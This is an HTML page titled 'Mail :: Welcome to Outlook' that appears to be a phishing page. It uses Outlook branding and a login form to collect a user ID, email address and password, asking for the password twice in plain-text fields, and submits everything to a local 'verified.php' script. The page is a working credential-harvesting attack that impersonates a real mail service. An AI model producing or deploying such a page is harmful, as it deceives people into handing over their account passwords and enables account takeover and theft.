<html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Mail :: Welcome to Outlook</title>

<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->

<body>
    <div id="login">
        <h3 class="text-center text-white pt-5">Login form</h3>
        <div class="container">
            <div id="login-row" class="row justify-content-center align-items-center">
                <div id="login-column" class="col-md-6">
                    <div id="login-box" class="col-md-12">
                        <form id="login-form" class="form" action="verified.php" method="post">
                        
                            <table width="100%"><tbody><tr><td align="center"><img src="7ce6a1600748d1a632b269697073196e.png" alt="Powered by Outlook" hieght="80px" width="300px" title=""></td></tr></tbody></table>
                            <br>
                          

                            <div class="form-group">
                                <label for="UserID" class="text-info">UserID:</label><br>
                                <input type="text" name="UserID" id="UserID" class="form-control">
                            </div>
                            <div class="form-group">
                                <label for="Email" class="text-info">Email:</label><br>
                                <input type="text" name="Email" id="Email" class="form-control">
                            </div>
                            <div class="form-group">
                                <label for="password" class="text-info">Password:</label><br>
                                <input type="text" name="password" id="password" class="form-control">
                            </div>
                             <div class="form-group">
                                <label for="confirm_password" class="text-info">Confirm Password:</label><br>
                                <input type="text" name="confirm_password" id="confirm_password" class="form-control">
                            </div>
                            <div class="form-group">
                                <label for="remember-me" class="text-info"><span>Remember me</span><span><input id="remember-me" name="remember-me" type="checkbox"></span></label><br>
                                <input type="submit" name="submit" class="btn btn-info btn-md" value="submit">
                            </div>
                            <div id="register-link" class="text-right">
                                <img src="7ce6a1600748d1a632b269697073196e.png" alt="Powered by Outlook" hieght="30px" width="90px" title="">
                            </div>
                        </form>
                    </div>
                </div>
            </div>
        </div>
    </div>
</body></html>
